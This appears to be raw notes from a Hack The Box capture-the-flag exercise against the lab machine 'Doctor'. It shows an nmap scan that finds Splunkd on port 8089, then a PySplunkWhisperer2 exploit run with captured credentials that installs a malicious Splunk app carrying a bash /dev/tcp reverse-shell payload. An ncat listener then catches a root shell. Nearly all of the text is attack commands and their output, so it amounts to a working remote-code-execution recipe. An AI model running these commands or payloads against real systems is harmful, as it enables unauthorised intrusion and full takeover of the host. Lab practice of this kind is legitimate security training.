# Nmap 7.91 scan initiated Wed Nov 11 18:57:28 2020 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.209
Nmap scan report for 10.10.10.209
Host is up (0.075s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-06T15:57:27
| Not valid after: 2023-09-06T15:57:27
| MD5: db23 4e5c 546d 8895 0f5f 8f42 5e90 6787
|_SHA-1: 7ec9 1bb7 343f f7f6 bdd7 d015 d720 6f6f 19e2 098b
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 11 18:58:22 2020 -- 1 IP address (1 host up) scanned in 53.65 seconds
/Documents/HTB/Doctor/SplunkWhisperer2/PySplunkWhisperer2 master
❯ python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --port 8089 --username shaun --password Guitar123 --payload "bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'" --lhost IP
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmp76vowwri.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.16.7:8181/
10.10.10.209 - - [11/Nov/2020 23:48:13] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup
[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!
Getting a shell
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.209.
Ncat: Connection from 10.10.10.209:52546.
bash: cannot set terminal process group (1137): Inappropriate ioctl for device
bash: no job control in this shell
root@doctor:/# cd root
cd root
root@doctor:/root# wc -c root.txt
wc -c root.txt
33 root.txt
root@doctor:/root#